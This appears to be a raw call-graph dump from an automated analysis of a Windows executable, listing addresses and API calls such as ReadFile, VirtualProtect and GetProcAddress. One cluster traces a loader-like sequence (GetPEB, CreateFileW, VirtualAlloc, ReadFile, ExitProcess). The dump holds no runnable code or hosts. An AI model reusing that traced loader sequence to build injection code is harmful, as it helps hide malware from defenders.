41ef74 85956->85958 85960 41efa3 85957->85960 85961 41ef9b GetLastError 85957->85961 85959 417f23 __wcsnicmp_l 67 API calls 85958->85959 85963 41ef79 85959->85963 85962 417f49 __dosmaperr 67 API calls 85960->85962 85960->85963 85961->85960 85962->85963 85963->85933 85964->85919 85965->85931 85966->85920 85967->85925 85969->85934 85970->85933 85971->85931 85973 414e31 85972->85973 85974 414e4d 85972->85974 86018 417f23 67 API calls __getptd_noexit 85973->86018 85976 414e46 85974->85976 85978 41486c __flush 101 API calls 85974->85978 85990 414f08 LeaveCriticalSection LeaveCriticalSection _fseek 85976->85990 85977 414e36 86019 417ebb 6 API calls 2 library calls 85977->86019 85980 414e59 85978->85980 85991 41e680 85980->85991 85983 41453a __fileno 67 API calls 85984 414e67 85983->85984 85995 41e5b3 85984->85995 85986 414e6d 85986->85976 85987 413a88 __fclose_nolock 67 API calls 85986->85987 85987->85976 85988->85720 85990->85726 85992 41e690 85991->85992 85993 414e61 85991->85993 85992->85993 85994 413a88 __fclose_nolock 67 API calls 85992->85994 85993->85983 85994->85993 85996 41e5bf __sopen_helper 85995->85996 85997 41e5c7 85996->85997 85999 41e5e2 85996->85999 86035 417f36 67 API calls __getptd_noexit 85997->86035 85998 41e5f0 86037 417f36 67 API calls __getptd_noexit 85998->86037 85999->85998 86004 41e631 85999->86004 86002 41e5cc 86036 417f23 67 API calls __getptd_noexit 86002->86036 86003 41e5f5 86038 417f23 67 API calls __getptd_noexit 86003->86038 86007 41ba3b ___lock_fhandle 68 API calls 86004->86007 86009 41e637 86007->86009 86008 41e5fc 86039 417ebb 6 API calls 2 library calls 86008->86039 86011 41e652 86009->86011 86012 41e644 86009->86012 86040 417f23 67 API calls __getptd_noexit 86011->86040 86020 41e517 86012->86020 86014 41e5d4 __sopen_helper 86014->85986 86016 41e64c 86041 41e676 LeaveCriticalSection __unlock_fhandle 86016->86041 86018->85977 86042 41b9c4 86020->86042 86022 41e527 86023 41e57d 86022->86023 86025 41e55b 86022->86025 86028 41b9c4 __close_nolock 67 API calls 86022->86028 86055 41b93e 68 API calls 2 library calls 86023->86055 86025->86023 86026 41b9c4 __close_nolock 67 API calls 86025->86026 86029 41e567 CloseHandle 86026->86029 86027 41e585 86030 41e5a7 86027->86030 86056 417f49 67 API calls 3 library calls 86027->86056 86031 41e552 86028->86031 86029->86023 86032 41e573 GetLastError 86029->86032 86030->86016 86034 41b9c4 __close_nolock 67 API calls 86031->86034 86032->86023 86034->86025 86035->86002 86036->86014 86037->86003 86038->86008 86040->86016 86041->86014 86043 41b9d1 86042->86043 86044 41b9e9 86042->86044 86045 417f36 __close 67 API calls 86043->86045 86047 417f36 __close 67 API calls 86044->86047 86049 41ba2e 86044->86049 86046 41b9d6 86045->86046 86048 417f23 __wcsnicmp_l 67 API calls 86046->86048 86050 41ba17 86047->86050 86051 41b9de 86048->86051 86049->86022 86052 417f23 __wcsnicmp_l 67 API calls 86050->86052 86051->86022 86053 41ba1e 86052->86053 86054 417ebb __wcsnicmp_l 6 API calls 86053->86054 86054->86049 86055->86027 86056->86030 86058 415126 __sopen_helper 86057->86058 86059 41513a _memset 86058->86059 86060 41516f 86058->86060 86061 415164 __sopen_helper 86058->86061 86086 417f23 67 API calls __getptd_noexit 86059->86086 86062 415965 __lock_file 68 API calls 86060->86062 86061->85730 86064 415177 86062->86064 86070 414f10 86064->86070 86065 415154 86087 417ebb 6 API calls 2 library calls 86065->86087 86072 414f2e _memset 86070->86072 86076 414f4c 86070->86076 86071 414f37 86139 417f23 67 API calls __getptd_noexit 86071->86139 86072->86071 86072->86076 86082 414f8b 86072->86082 86074 414f3c 86140 417ebb 6 API calls 2 library calls 86074->86140 86088 4151a6 LeaveCriticalSection LeaveCriticalSection _fseek 86076->86088 86078 4150d5 _memset 86143 417f23 67 API calls __getptd_noexit 86078->86143 86079 4150a9 _memset 86142 417f23 67 API calls __getptd_noexit 86079->86142 86080 41453a __fileno 67 API calls 86080->86082 86082->86076 86082->86078 86082->86079 86082->86080 86089 41ed9e 86082->86089 86119 41e6b1 86082->86119 86141 41ee9b 67 API calls 3 library calls 86082->86141 86086->86065 86088->86061 86090 41edaa __sopen_helper 86089->86090 86091 41edb2 86090->86091 86092 41edcd 86090->86092 86213 417f36 67 API calls __getptd_noexit 86091->86213 86093 41eddb 86092->86093 86098 41ee1c 86092->86098 86215 417f36 67 API calls __getptd_noexit 86093->86215 86096 41edb7 86214 417f23 67 API calls __getptd_noexit 86096->86214 86097 41ede0 86216 417f23 67 API calls __getptd_noexit 86097->86216 86101 41ee29 86098->86101 86102 41ee3d 86098->86102 86218 417f36 67 API calls __getptd_noexit 86101->86218 86103 41ba3b ___lock_fhandle 68 API calls 86102->86103 86105 41ee43 86103->86105 86107 41ee50 86105->86107 86108 41ee66 86105->86108 86106 41ee2e 86219 417f23 67 API calls __getptd_noexit 86106->86219 86144 41e7dc 86107->86144 86220 417f23 67 API calls __getptd_noexit 86108->86220 86111 41edbf __sopen_helper 86111->86082 86114 41ede7 86217 417ebb 6 API calls 2 library calls 86114->86217 86115 41ee5e 86222 41ee91 LeaveCriticalSection __unlock_fhandle 86115->86222 86116 41ee6b 86221 417f36 67 API calls __getptd_noexit 86116->86221 86120 41e6c1 86119->86120 86124 41e6de 86119->86124 86226 417f23 67 API calls __getptd_noexit 86120->86226 86122 41e6c6 86227 417ebb 6 API calls 2 library calls 86122->86227 86125 41e713 86124->86125 86131 41e6d6 86124->86131 86223 423600 86124->86223 86127 41453a __fileno 67 API calls 86125->86127 86128 41e727 86127->86128 86129 41ed9e __read 79 API calls 86128->86129 86130 41e72e 86129->86130 86130->86131 86132 41453a __fileno 67 API calls 86130->86132 86131->86082 86133 41e751 86132->86133 86133->86131 86134 41453a __fileno 67 API calls 86133->86134 86135 41e75d 86134->86135 86135->86131 86136 41453a __fileno 67 API calls 86135->86136 86137 41e769 86136->86137 86138 41453a __fileno 67 API calls 86137->86138 86138->86131 86139->86074 86141->86082 86142->86074 86143->86074 86145 41e813 86144->86145 86146 41e7f8 86144->86146 86148 41e822 86145->86148 86150 41e849 86145->86150 86147 417f36 __close 67 API calls 86146->86147 86149 41e7fd 86147->86149 86151 417f36 __close 67 API calls 86148->86151 86153 417f23 __wcsnicmp_l 67 API calls 86149->86153 86152 41e868 86150->86152 86167 41e87c 86150->86167 86154 41e827 86151->86154 86155 417f36 __close 67 API calls 86152->86155 86156 41e805 86153->86156 86158 417f23 __wcsnicmp_l 67 API calls 86154->86158 86160 41e86d 86155->86160 86156->86115 86157 41e8d4 86159 417f36 __close 67 API calls 86157->86159 86161 41e82e 86158->86161 86163 41e8d9 86159->86163 86164 417f23 __wcsnicmp_l 67 API calls 86160->86164 86162 417ebb __wcsnicmp_l 6 API calls 86161->86162 86162->86156 86165 417f23 __wcsnicmp_l 67 API calls 86163->86165 86166 41e874 86164->86166 86165->86166 86170 417ebb __wcsnicmp_l 6 API calls 86166->86170 86167->86156 86167->86157 86168 41e8b0 86167->86168 86169 41e8f5 86167->86169 86168->86157 86171 41e8bb ReadFile 86168->86171 86173 416fb6 __malloc_crt 67 API calls 86169->86173 86170->86156 86174 41ed62 GetLastError 86171->86174 86175 41e9e7 86171->86175 86176 41e90b 86173->86176 86177 41ebe8 86174->86177 86178 41ed6f 86174->86178 86175->86174 86182 41e9fb 86175->86182 86179 41e931 86176->86179 86180 41e913 86176->86180 86186 417f49 __dosmaperr 67 API calls 86177->86186 86192 41eb6d 86177->86192 86184 417f23 __wcsnicmp_l 67 API calls 86178->86184 86183 423462 __lseeki64_nolock 69 API calls 86179->86183 86181 417f23 __wcsnicmp_l 67 API calls 86180->86181 86185 41e918 86181->86185 86182->86192 86193 41ea17 86182->86193 86196 41ec2d 86182->86196 86187 41e93d 86183->86187 86188 41ed74 86184->86188 86190 417f36 __close 67 API calls 86185->86190 86186->86192 86187->86171 86189 417f36 __close 67 API calls 86188->86189 86189->86192 86190->86156 86191 413a88 __fclose_nolock 67 API calls 86191->86156 86192->86156 86192->86191 86194 41ea7d ReadFile 86193->86194 86203 41eafa 86193->86203 86197 41ea9b GetLastError 86194->86197 86205 41eaa5 86194->86205 86195 41eca5 ReadFile 86198 41ecc4 GetLastError 86195->86198 86206 41ecce 86195->86206 86196->86192 86196->86195 86197->86193 86197->86205 86198->86196 86198->86206 86199 41ebbe MultiByteToWideChar 86199->86192 86200 41ebe2 GetLastError 86199->86200 86200->86177 86201 41eb75 86208 41eb32 86201->86208 86209 41ebac 86201->86209 86202 41eb68 86204 417f23 __wcsnicmp_l 67 API calls 86202->86204 86203->86192 86203->86201 86203->86202 86203->86208 86204->86192 86205->86193 86210 423462 __lseeki64_nolock 69 API calls 86205->86210 86206->86196 86207 423462 __lseeki64_nolock 69 API calls 86206->86207 86207->86206 86208->86199 86211 423462 __lseeki64_nolock 69 API calls 86209->86211 86210->86205 86212 41ebbb 86211->86212 86212->86199 86213->86096 86214->86111 86215->86097 86216->86114 86218->86106 86219->86114 86220->86116 86221->86115 86222->86111 86224 416fb6 __malloc_crt 67 API calls 86223->86224 86225 423615 86224->86225 86225->86125 86226->86122 86231 414cef GetSystemTimeAsFileTime __aulldiv 86228->86231 86230 4431ef 86230->85733 86231->86230 86232->85740 86234->85746 86239 4523e1 _wcscpy 86235->86239 86236 4151b0 81 API calls __fread_nolock 86236->86239 86237 44afdc GetSystemTimeAsFileTime 86237->86239 86238 452553 86238->85655 86238->85656 86239->86236 86239->86237 86239->86238 86240 41557c 105 API calls _fseek 86239->86240 86240->86239 86242 44b1b4 86241->86242 86243 44b1a6 86241->86243 86245 44b1ca 86242->86245 86246 414e06 138 API calls 86242->86246 86247 44b1c2 86242->86247 86244 414e06 138 API calls 86243->86244 86244->86242 86276 4352d1 81 API calls 2 library calls 86245->86276 86248 44b2c1 86246->86248 86247->85683 86248->86245 86250 44b2cf 86248->86250 86255 414e94 __fcloseall 106 API calls 86250->86255 86259 44b2dc 86250->86259 86251 44b20d 86252 44b211 86251->86252 86253 44b23b 86251->86253 86254 44b21e 86252->86254 86257 414e94 __fcloseall 106 API calls 86252->86257 86277 43526e 86253->86277 86258 44b22e 86254->86258 86261 414e94 __fcloseall 106 API calls 86254->86261 86255->86259 86257->86254 86258->85683 86259->85683 86260 44b242 86262 44b270 86260->86262 86263 44b248 86260->86263 86261->86258 86287 44b0af 111 API calls 86262->86287 86265 44b255 86263->86265 86268 414e94 __fcloseall 106 API calls 86263->86268 86266 44b265 86265->86266 86269 414e94 __fcloseall 106 API calls 86265->86269 86266->85683 86267 44b276 86288 43522c 67 API calls __fclose_nolock 86267->86288 86268->86265 86269->86266 86271 44b27c 86272 44b289 86271->86272 86273 414e94 __fcloseall 106 API calls 86271->86273 86274 44b299 86272->86274 86275 414e94 __fcloseall 106 API calls 86272->86275 86273->86272 86274->85683 86275->86274 86276->86251 86278 4138ba _malloc 67 API calls 86277->86278 86279 43527d 86278->86279 86280 4138ba _malloc 67 API calls 86279->86280 86281 43528d 86280->86281 86282 4138ba _malloc 67 API calls 86281->86282 86283 43529d 86282->86283 86285 4352bc 86283->86285 86289 43522c 67 API calls __fclose_nolock 86283->86289 86285->86260 86286 4352c8 86286->86260 86287->86267 86288->86271 86289->86286 86290->85578 86291->85580 86292->85600 86293->85600 86294->85600 86295->85594 86296->85600 86297->85600 86298->85610 86299->85618 86301->85619 86302->85504 86304 410148 SHGetDesktopFolder 86303->86304 86307 4101a3 _wcscpy 86303->86307 86305 41015a _wcscpy 86304->86305 86304->86307 86306 41018a SHGetPathFromIDListW 86305->86306 86305->86307 86306->86307 86307->85508 86308->85510 86310 40f5e0 152 API calls 86309->86310 86311 40f417 86310->86311 86312 42ca37 86311->86312 86314 40f42c 86311->86314 86315 42ca1f 86311->86315 86313 452574 140 API calls 86312->86313 86316 42ca50 86313->86316 86350 4037e0 139 API calls 7 library calls 86314->86350 86351 43717f 110 API calls _printf 86315->86351 86319 42ca76 86316->86319 86320 42ca54 86316->86320 86324 41171a 75 API calls 86319->86324 86323 434fe1 106 API calls 86320->86323 86321 40f446 86321->85507 86322 42ca2d 86322->86312 86325 42ca5e 86323->86325 86339 42cacc ctype 86324->86339 86352 43717f 110 API calls _printf 86325->86352 86327 42ca6c 86327->86319 86328 42ccc3 86329 413a88 __fclose_nolock 67 API calls 86328->86329 86330 42cccd 86329->86330 86331 434fe1 106 API calls 86330->86331 86332 42ccda 86331->86332 86336 401b70 75 API calls 86336->86339 86339->86328 86339->86336 86340 445051 86339->86340 86343 402cc0 75 API calls 2 library calls 86339->86343 86344 4026a0 86339->86344 86353 44c80c 87 API calls 3 library calls 86339->86353 86354 44b408 75 API calls 86339->86354 86341 41171a 75 API calls 86340->86341 86342 445080 _memcpy_s 86341->86342 86342->86339 86342->86342 86343->86339 86345 40276b 86344->86345 86346 4026af 86344->86346 86345->86339 86346->86345 86347 41171a 75 API calls 86346->86347 86348 4026ee ctype 86346->86348 86347->86348 86348->86345 86349 41171a 75 API calls 86348->86349 86349->86348 86350->86321 86351->86322 86352->86327 86353->86339 86354->86339 86355->85517 86356->85518 86357->85527 86358 431914 86359 431920 86358->86359 86360 431928 86359->86360 86361 43193d 86359->86361 86622 45e62e 116 API calls 3 library calls 86360->86622 86623 47f2b4 174 API calls 86361->86623 86364 43194a 86371 4095b0 ctype 86364->86371 86624 45e62e 116 API calls 3 library calls 86364->86624 86366 409708 86368 4097af 86368->86366 86609 40d590 VariantClear 86368->86609 86370 4315b8 WaitForSingleObject 86370->86371 86373 4315d6 GetExitCodeProcess CloseHandle 86370->86373 86371->86366 86371->86368 86371->86370 86372 431623 Sleep 86371->86372 86379 40986e Sleep 86371->86379 86381 409894 86371->86381 86383 4098f1 TranslateMessage DispatchMessageW 86371->86383 86399 45e62e 116 API calls 86371->86399 86400 4319c9 VariantClear 86371->86400 86402 4092c0 VariantClear 86371->86402 86404 40b380 86371->86404 86428 409340 86371->86428 86461 409030 86371->86461 86475 40d300 86371->86475 86480 40d320 86371->86480 86486 409a40 86371->86486 86625 40e380 VariantClear ctype 86371->86625 86376 43163b timeGetTime 86372->86376 86372->86381 86613 40d590 VariantClear 86373->86613 86376->86381 86379->86381 86382 409880 timeGetTime 86379->86382 86381->86371 86384 431673 CloseHandle 86381->86384 86385 43170c GetExitCodeProcess CloseHandle 86381->86385 86386 40d590 VariantClear 86381->86386 86387 46dd22 133 API calls 86381->86387 86389 46e641 134 API calls 86381->86389 86392 431781 Sleep 86381->86392 86401 4092c0 VariantClear 86381->86401 86610 447e59 75 API calls 86381->86610 86611 453b07 77 API calls 86381->86611 86612 4646a2 76 API calls 86381->86612 86614 444233 88 API calls _wcslen 86381->86614 86615 457509 VariantClear 86381->86615 86616 404120 86381->86616 86620 4717e3 VariantClear 86381->86620 86621 436272 6 API calls 86381->86621 86382->86381 86383->86371 86384->86381 86385->86381 86386->86381 86387->86381 86389->86381 86392->86371 86399->86371 86400->86371 86401->86381 86402->86371 86405 40b3a5 86404->86405 86406 40b53d 86404->86406 86407 430a99 86405->86407 86412 40b3b6 86405->86412 86626 45e62e 116 API calls 3 library calls 86406->86626 86627 45e62e 116 API calls 3 library calls 86407->86627 86410 430aae 86415 4092c0 VariantClear 86410->86415 86411 40b528 86411->86371 86412->86410 86416 40b3f2 86412->86416 86424 40b4fd ctype 86412->86424 86414 430dc9 86414->86414 86415->86411 86417 430ae9 VariantClear 86416->86417 86419 40b429 86416->86419 86426 40b476 ctype 86416->86426 86427 40b43b ctype 86417->86427 86418 40b4eb 86418->86424 86629 40e380 VariantClear ctype 86418->86629 86419->86427 86628 40e380 VariantClear ctype 86419->86628 86420 430d41 VariantClear 86420->86424 86423 41171a 75 API calls 86423->86426 86424->86411 86630 45e62e 116 API calls 3 library calls 86424->86630 86425 430d08 ctype 86425->86420 86425->86424 86426->86418 86426->86425 86427->86423 86427->86426 86429 409386 86428->86429 86433 409395 86428->86433 86631 4042f0 75 API calls __cinit 86429->86631 86432 42fba9 86635 45e62e 116 API calls 3 library calls 86432->86635 86433->86432 86435 42fc07 86433->86435 86437 42fc85 86433->86437 86439 42fcd8 86433->86439 86441 42fd4f 86433->86441 86446 42fd39 86433->86446 86447 40946f 86433->86447 86452 40947b 86433->86452 86454 4094c1 86433->86454 86456 4092c0 VariantClear 86433->86456 86460 409484 ctype 86433->86460 86634 453155 75 API calls 86433->86634 86636 40c620 118 API calls 86433->86636 86638 45e62e 116 API calls 3 library calls 86433->86638 86637 45e62e 116 API calls 3 library calls 86435->86637 86639 4781ae 140 API calls 86437->86639 86641 47f2b4 174 API calls 86439->86641 86443 4092c0 VariantClear 86441->86443 86443->86460 86445 42fc9c 86445->86460 86640 45e62e 116 API calls 3 library calls 86445->86640 86643 45e62e 116 API calls 3 library calls 86446->86643 86632 409210 VariantClear 86447->86632 86448 42fce9 86448->86460 86642 45e62e 116 API calls 3 library calls 86448->86642 86455 4092c0 VariantClear 86452->86455 86454->86460 86633 404260 76 API calls 86454->86633 86455->86460 86456->86433 86458 4094e1 86459 4092c0 VariantClear 86458->86459 86459->86460 86460->86371 86644 409110 117 API calls 86461->86644 86463 42ceb6 86654 410ae0 VariantClear ctype 86463->86654 86465 40906e 86465->86463 86467 42cea9 86465->86467 86469 4090a4 86465->86469 86466 42cebf 86653 45e62e 116 API calls 3 library calls 86467->86653 86645 404160 86469->86645 86472 4090f0 ctype 86472->86371 86473 4092c0 VariantClear 86474 4090be ctype 86473->86474 86474->86472 86474->86473 86477 4292e3 86475->86477 86479 40d30c 86475->86479 86476 429323 86476->86371 86477->86476 86478 4292fd TranslateAcceleratorW 86477->86478 86478->86479 86479->86371 86481 4296d0 86480->86481 86484 40d32f 86480->86484 86481->86371 86482 40d33c 86482->86371 86483 42972a IsDialogMessageW 86483->86482 86483->86484 86484->86482 86484->86483 86789 4340ec GetClassLongW 86484->86789 86487 409a66 _wcslen 86486->86487 86488 40aade _memcpy_s ctype 86487->86488 86489 41171a 75 API calls 86487->86489 86491 401380 75 API calls 86488->86491 86490 409a9c _memcpy_s 86489->86490 86492 41171a 75 API calls 86490->86492 86493 42cee9 86491->86493 86494 409abd 86492->86494 86495 41171a 75 API calls 86493->86495 86494->86488 86496 409aeb CharUpperBuffW 86494->86496 86499 409b09 ctype 86494->86499 86497 42cf10 _memcpy_s 86495->86497 86496->86499 86820 45e62e 116 API calls 3 library calls 86497->86820 86506 409b88 ctype 86499->86506 86791 47d10e 150 API calls 86499->86791 86501 4092c0 VariantClear 86502 42e5e0 86501->86502 86821 410ae0 VariantClear ctype 86502->86821 86504 42e5f2 86505 409e4a 86505->86497 86508 41171a 75 API calls 86505->86508 86512 409ea4 86505->86512 86506->86497 86506->86505 86507 40aa5b 86506->86507 86510 40c3e0 75 API calls 86506->86510 86511 40aa81 _memcpy_s ctype 86506->86511 86515 42d195 VariantClear 86506->86515 86522 4092c0 VariantClear 86506->86522 86531 41171a 75 API calls 86506->86531 86538 42d128 86506->86538 86539 42d20c 86506->86539 86552 42dbb9 86506->86552 86792 40c620 118 API calls 86506->86792 86794 40be00 75 API calls 2 library calls 86506->86794 86795 40e380 VariantClear ctype 86506->86795 86509 41171a 75 API calls 86507->86509 86508->86512 86509->86511 86510->86506 86535 41171a 75 API calls 86511->86535 86513 409ed0 86512->86513 86514 41171a 75 API calls 86512->86514 86521 42d50d 86513->86521 86571 409ef8 _memcpy_s ctype 86513->86571 86800 40b800 VariantClear VariantClear ctype 86513->86800 86519 42d480 86514->86519 86515->86506 86516 40a3a7 86525 40a415 86516->86525 86568 42db5c 86516->86568 86518 42d491 86797 40df50 75 API calls 86518->86797 86519->86518 86796 44b3f6 75 API calls 86519->86796 86520 42d527 86520->86571 86802 40e2e0 VariantClear ctype 86520->86802 86521->86520 86801 40b800 VariantClear VariantClear ctype 86521->86801 86522->86506 86528 41171a 75 API calls 86525->86528 86542 40a41c 86528->86542 86531->86506 86533 42db96 86807 45e62e 116 API calls 3 library calls 86533->86807 86535->86488 86536 42d4a6 86798 4530b3 75 API calls 86536->86798 86541 4092c0 VariantClear 86538->86541 86539->86371 86540 42d4d7 86799 4530b3 75 API calls 86540->86799 86544 42d131 86541->86544 86554 40a481 86542->86554 86808 40c8a0 VariantClear ctype 86542->86808 86793 410ae0 VariantClear ctype 86544->86793 86550 402cc0 75 API calls 86550->86571 86551 4092c0 VariantClear 86582 40a534 _memcpy_s ctype 86551->86582 86552->86501 86553 41171a 75 API calls 86553->86571 86555 40a4ed 86554->86555 86556 42dc1e VariantClear 86554->86556 86554->86582 86560 40a4ff ctype 86555->86560 86809 40e380 VariantClear ctype 86555->86809 86556->86560 86559 41171a 75 API calls 86559->86582 86560->86559 86560->86582 86561 4019e0 76 API calls 86561->86571 86564 44b3f6 75 API calls 86564->86571 86565 42deb6 VariantClear 86565->86582 86566 411421 74 API calls __cinit 86566->86571 86567 40a73c 86569 42e237 86567->86569 86577 40a76b 86567->86577 86806 4721e5 VariantClear 86568->86806 86813 46e709 VariantClear VariantClear ctype 86569->86813 86570 42df47 VariantClear 86570->86582 86571->86488 86571->86516 86571->86533 86571->86550 86571->86553 86571->86561 86571->86564 86571->86566 86571->86568 86576 40a053 86571->86576 86803 45ee98 75 API calls 86571->86803 86804 404260 76 API calls 86571->86804 86805 409210 VariantClear 86571->86805 86572 42dfe9 VariantClear 86572->86582 86574 40a7a2 86590 40a7ad ctype 86574->86590 86814 40b800 VariantClear VariantClear ctype 86574->86814 86575 40e380 VariantClear 86575->86582 86576->86371 86577->86574 86601 40a800 ctype 86577->86601 86790 40b800 VariantClear VariantClear ctype 86577->86790 86580 41171a 75 API calls 86580->86582 86581 41171a 75 API calls 86585 42dd10 VariantInit VariantCopy 86581->86585 86582->86551 86582->86565 86582->86567 86582->86569 86582->86570 86582->86572 86582->86575 86582->86580 86582->86581 86810 46e9cd 75 API calls 86582->86810 86811 409210 VariantClear 86582->86811 86812 44cc6c VariantClear ctype 86582->86812 86583 40a8b0 86595 40a8c2 ctype 86583->86595 86816 40e380 VariantClear ctype 86583->86816 86584 42e312 86586 42e337 VariantClear 86584->86586 86584->86595 86585->86582 86588 42dd30 VariantClear 86585->86588 86586->86595 86587 42e3b2 86596 42e3da VariantClear 86587->86596 86602 40a91a ctype 86587->86602 86588->86582 86591 40a7ee 86590->86591 86594 42e2a7 VariantClear 86590->86594 86590->86601 86591->86601 86815 40e380 VariantClear ctype 86591->86815 86592 40a908 86592->86602 86817 40e380 VariantClear ctype 86592->86817 86594->86601 86595->86587 86595->86592 86596->86602 86597 42e47f 86603 42e4a3 VariantClear 86597->86603 86608 40a957 ctype 86597->86608 86599 40a945 86599->86608 86818 40e380 VariantClear ctype 86599->86818 86601->86583 86601->86584 86602->86597 86602->86599 86603->86608 86605 40aa22 ctype 86605->86371 86606 42e559 VariantClear 86606->86608 86608->86605 86608->86606 86819 40e380 VariantClear ctype 86608->86819 86609->86366 86610->86381 86611->86381 86612->86381 86613->86381 86614->86381 86615->86381 86617 40412e 86616->86617 86618 4092c0 VariantClear 86617->86618 86619 404138 86618->86619 86619->86392 86620->86381 86621->86381 86622->86371 86623->86364 86624->86371 86625->86371 86626->86407 86627->86410 86628->86427 86629->86424 86630->86414 86631->86433 86632->86452 86633->86458 86634->86433 86635->86460 86636->86433 86637->86460 86638->86433 86639->86445 86640->86460 86641->86448 86642->86460 86643->86441 86644->86465 86646 4092c0 VariantClear 86645->86646 86647 40416e 86646->86647 86648 404120 VariantClear 86647->86648 86649 40419b 86648->86649 86655 40efe0 86649->86655 86663 4734b7 86649->86663 86650 4041c6 86650->86463 86650->86474 86653->86463 86654->86466 86656 40eff5 CreateFileW 86655->86656 86657 4299bf 86655->86657 86658 40f017 86656->86658 86657->86658 86659 4299c4 CreateFileW 86657->86659 86658->86650 86659->86658 86660 4299ea 86659->86660 86707 40e0d0 SetFilePointerEx SetFilePointerEx 86660->86707 86662 4299f5 86662->86658 86664 453063 111 API calls 86663->86664 86665 4734d7 86664->86665 86666 473545 86665->86666 86667 47350c 86665->86667 86708 463c42 86666->86708 86669 4092c0 VariantClear 86667->86669 86675 473514 86669->86675 86670 473558 86671 47355c 86670->86671 86687 473595 86670->86687 86672 4092c0 VariantClear 86671->86672 86682 473564 86672->86682 86673 473616 86721 463d7e 86673->86721 86675->86650 86676 473622 86678 473697 86676->86678 86679 47362c 86676->86679 86677 453063 111 API calls 86677->86687 86755 457838 86678->86755 86683 4092c0 VariantClear 86679->86683 86682->86650 86685 473634 86683->86685 86685->86650 86686 473655 86690 4092c0 VariantClear 86686->86690 86687->86673 86687->86677 86687->86686 86767 462f5a 87 API calls __wcsicoll 86687->86767 86701 47365d 86690->86701 86691 4736b0 86768 45e62e 116 API calls 3 library calls 86691->86768 86692 4736c9 86769 40e7e0 76 API calls 86692->86769 86695 4736db 86705 4736ff 86695->86705 86770 40d030 76 API calls 86695->86770 86696 4736ba GetCurrentProcess TerminateProcess 86696->86692 86698 473731 86703 473744 FreeLibrary 86698->86703 86704 47374b 86698->86704 86699 4736f1 86771 46b945 134 API calls 2 library calls 86699->86771 86701->86650 86703->86704 86704->86650 86705->86698 86772 40d030 76 API calls 86705->86772 86773 46b945 134 API calls 2 library calls 86705->86773 86707->86662 86774 45335b 76 API calls 86708->86774 86710 463c5d 86775 442c52 80 API calls _wcslen 86710->86775 86712 463c72 86714 40c060 75 API calls 86712->86714 86720 463cac 86712->86720 86715 463c8e 86714->86715 86776 4608ce 75 API calls _memcpy_s 86715->86776 86717 463ca4 86718 40c740 75 API calls 86717->86718 86718->86720 86719 463cf7 86719->86670 86720->86719 86777 462f5a 87 API calls __wcsicoll 86720->86777 86722 453063 111 API calls 86721->86722 86723 463d99 86722->86723 86724 463de0 86723->86724 86725 463dca 86723->86725 86779 40c760 78 API calls 86724->86779 86778 453081 111 API calls 86725->86778 86728 463dd0 LoadLibraryW 86730 463e09 86728->86730 86729 463de7 86745 463e19 86729->86745 86780 40c760 78 API calls 86729->86780 86731 463e3e 86730->86731 86730->86745 86735 463e4e 86731->86735 86736 463e7b 86731->86736 86733 463dfb 86733->86745 86781 40c760 78 API calls 86733->86781 86782 40d500 75 API calls 86735->86782 86784 40c760 78 API calls 86736->86784 86739 463e82 GetProcAddress 86741 463e90 86739->86741 86740 463e57 86783 45efe7 77 API calls ctype 86740->86783 86744 463e79 86741->86744 86741->86745 86746 463edf 86741->86746 86743 463e62 GetProcAddress 86743->86744 86744->86741 86785 403470 75 API calls _memcpy_s 86744->86785 86745->86676 86746->86745 86748 463eef FreeLibrary 86746->86748 86748->86745 86749 463eb4 86786 40d500 75 API calls 86749->86786 86751 463ebd 86787 45efe7 77 API calls ctype 86751->86787 86753 463ec8 GetProcAddress 86788 401330 ctype 86753->86788 86756 457a4c 86755->86756 86762 45785f _strcat _wcslen _wcscpy ctype 86755->86762 86763 410d40 86756->86763 86757 40c760 78 API calls 86757->86762 86758 443576 78 API calls 86758->86762 86759 453081 111 API calls 86759->86762 86760 4138ba 67 API calls _malloc 86760->86762 86761 40f580 77 API calls 86761->86762 86762->86756 86762->86757 86762->86758 86762->86759 86762->86760 86762->86761 86765 410d55 86763->86765 86764 410ded VirtualProtect 86766 410dbb 86764->86766 86765->86764 86765->86766 86766->86691 86766->86692 86767->86687 86768->86696 86769->86695 86770->86699 86771->86705 86772->86705 86773->86705 86774->86710 86775->86712 86776->86717 86777->86719 86778->86728 86779->86729 86780->86733 86781->86730 86782->86740 86783->86743 86784->86739 86785->86749 86786->86751 86787->86753 86788->86746 86789->86484 86790->86574 86791->86499 86792->86506 86793->86605 86794->86506 86795->86506 86796->86518 86797->86536 86798->86540 86799->86513 86800->86521 86801->86520 86802->86571 86803->86571 86804->86571 86805->86571 86806->86533 86807->86552 86808->86542 86809->86560 86810->86582 86811->86582 86812->86582 86813->86574 86814->86590 86815->86601 86816->86595 86817->86602 86818->86608 86819->86608 86820->86552 86821->86504 86822 538e3c0 86836 538c010 86822->86836 86824 538e490 86839 538e2b0 86824->86839 86826 538e4b9 CreateFileW 86828 538e508 86826->86828 86829 538e50d 86826->86829 86829->86828 86830 538e524 VirtualAlloc 86829->86830 86830->86828 86831 538e542 ReadFile 86830->86831 86831->86828 86832 538e55d 86831->86832 86833 538d2b0 13 API calls 86832->86833 86834 538e590 86833->86834 86835 538e5b3 ExitProcess 86834->86835 86835->86828 86842 538f4c0 GetPEB 86836->86842 86838 538c69b 86838->86824 86840 538e2b9 Sleep 86839->86840 86841 538e2c7 86840->86841 86843 538f4ea 86842->86843 86843->86838 86844 42919b 86849 40ef10 86844->86849 86847 411421 __cinit 74 API calls 86848 4291aa 86847->86848 86850 41171a 75 API calls 86849->86850 86851 40ef17 86850->86851 86852 42ad48 86851->86852 86857 40ef40 74 API calls __cinit 86851->86857 86854 40ef2a 86858 40e470 86854->86858 86857->86854 86859 40c060 75 API calls 86858->86859 86860 40e483 GetVersionExW 86859->86860 86861 4021e0 75 API calls 86860->86861 86862 40e4bb 86861->86862 86884 40e600 86862->86884 86867 42accc 86870 42ad28 GetSystemInfo 86867->86870 86873 42ad38 GetSystemInfo 86870->86873 86871 40e557 GetCurrentProcess 86904 40ee30 LoadLibraryA GetProcAddress 86871->86904 86872 40e56c 86872->86873 86897 40eee0 86872->86897 86877 40e5c9 86901 40eea0 86877->86901 86880 40e5e0 86882 40e5f1 FreeLibrary 86880->86882 86883 40e5f4 86880->86883 86881 40e5dd FreeLibrary 86881->86880 86882->86883 86883->86847 86885 40e60b 86884->86885 86886 40c740 75 API calls 86885->86886 86887 40e4c2 86886->86887 86888 40e620 86887->86888 86889 40e62a 86888->86889 86890 42ac93 86889->86890 86891 40c740 75 API calls 86889->86891 86892 40e4ce 86891->86892 86892->86867 86893 40ee70 86892->86893 86894 40e551 86893->86894 86895 40ee76 